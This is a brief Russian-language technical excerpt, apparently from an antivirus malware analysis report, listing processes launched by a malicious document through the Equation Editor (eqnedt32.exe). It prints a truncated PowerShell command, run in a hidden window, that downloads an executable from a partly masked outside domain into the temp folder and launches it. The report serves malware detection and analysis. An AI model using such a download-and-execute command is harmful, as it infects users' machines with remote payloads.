Техническая информация
- '<SYSTEM32>\cmd.exe' /c PowerShell "try{$lJyf=$env:temp+'\pvQ.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://ne#####iesregular.com/muchmore_output807070.exe' -Destination $lJyf;(New-Object -com ...
- '<SYSTEM32>\cmd.exe' /c PowerShell "try{$lJyf=$env:temp+'\pvQ.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://ne#####iesregular.com/muchmore_output807070.exe' -Destination $lJyf;(New-Object -com ...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding